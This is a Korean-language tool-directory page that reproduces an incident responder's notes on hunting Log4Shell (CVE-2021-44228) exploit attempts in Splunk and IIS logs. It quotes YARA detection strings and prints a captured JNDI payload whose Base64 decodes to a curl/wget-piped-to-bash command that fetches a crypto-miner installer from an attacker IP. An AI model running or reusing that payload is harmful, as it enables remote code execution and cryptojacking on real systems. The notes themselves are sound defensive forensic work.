Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/azeemering/cve-2021-44228-dfir-notes
Vulnerability AnalysisMalware AnalysisDigital ForensicsThreat IntelligenceLearning & EducationIncident ResponseLog Analysis
GitHubazeemering/cve-2021-44228-dfir-notes

CVE-2021-44228-DFIR-Notes

CVE-2021-44228 DFIR 노트

저장소 보기
724년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-44228 DFIR-Notes

집에 운전해서 가는 중에 #log4shell 취약점에 대한 첫 메시지가 흘러들어오기 시작했습니다.

2021년 12월 9일, Apache Log4j 2 유틸리티의 여러 버전에 영향을 미치는 높은 심각도의 취약점(CVE-2021-44228)이 프로젝트의 GitHub를 통해 공개적으로 공개되었습니다. 알리바바 클라우드 보안 팀의 Chen Zhaojun이 발견한 이 취약점은 Apache Log4j 2 버전 2.0부터 2.14.1까지 영향을 미칩니다.

집에 도착하자마자 바로 뛰어들었습니다. 평소처럼 Splunk4tw.

첫 번째 개념 증명 익스플로잇이 GitHub에 게시된 후, 공격자들은 인증이 필요 없는 원격으로 악용 가능한 이 보안 결함에 취약한 시스템을 찾기 위해 인터넷을 스캔하기 시작했습니다. 아래에서 볼 수 있는 것은 그러한 스캔 및 익스플로잇 시도의 일부입니다.

가장 먼저 한 일은 누군가 초기 YARA 규칙을 내놓았는지 확인하는 것이었습니다. 여기서 찾았습니다: https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b (감사합니다 Florian Roth)

다음과 같은 탐지 문자열을 언급하고 있습니다: strings: $x1 = "${jndi:ldap:/" $x2 = "${jndi:rmi:/" $x3 = "${jndi:ldaps:/" $x4 = "${jndi:dns:/"

두렵지 않습니다.....CPU를 좀 갈아서 최악의 Splunk 검색으로 바로 마무리합시다.

index=* jndi:ldap* (updated query with index=* "{lower:l}${lower:d}a${lower:p}")

IIS 로그와 Windows 이벤트 로그(일부 수정됨)에서 몇 가지 히트가 있었고, 방화벽 로그에서 많은 차단된 시도가 있었습니다....

IIS: 이미지

WINEVENTLOG: 이미지

IP 주소 45.155.205.233 확인 중....러시아 상트페테르부르크....정말 놀랍군요. 이미지

발견된 문자열은 고전적인 교과서적인 난독화된 인코딩 악성 문자열처럼 보입니다. 무슨 일을 하는지 살펴봅시다:

cyberchef를 사용하여 Base64 문자열을 디코딩해 보겠습니다. 2021-12-10 13:26:16 [redacted] GET / - 443 - xxx.xx.xxx.xx ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNDUuMzUuMTk1LjYzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE0NS4zNS4xOTUuNjM6ODApfGJhc2g=} http://[redacted]:80/ 200 0 0 171

이미지

(curl -s 45.155.xx.233:xxxx/145.xx.195.63:80||wget -q -O- 45.xx.205.233:xxxx/145.xx.xxx.63:80)|bash

Curl...셸 스크립트 실행, bash....OMG. 이 지저분한 코드가 무슨 일을 할지 감이 오기 시작합니다....

샌드박스에서 curl 명령을 실행해 보겠습니다:

이미지

368줄의 코드입니다. (전체 스크립트를 보고 싶다면 여기서 실행하세요 --> https://reqbin.com/c-ipejxywd)

일부 발췌:

이미지 이미지 이미지

그리고 끝난 후에는 로그 파일까지 삭제합니다...정말 놀랍군요:

이미지

기본적으로 Kingsin이라는 크립토 마이너 악성코드를 설치하려고 시도합니다. 대상은 nix 시스템입니다. 익스플로잇이 다양한 페이로드를 실행하는 데 사용될 것이므로 시스템을 반드시 패치하세요.

금요일 저녁에 왓츠앱으로 이 문제에 대해 토론해준 동료들 Martijn (Umbrio)과 Rob [redacted]에게 감사드립니다. 00:09, 잘 시간입니다.

#업데이트 및 좋은 자료#

  • https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html
  • https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
  • https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228

이미지

도구 다운로드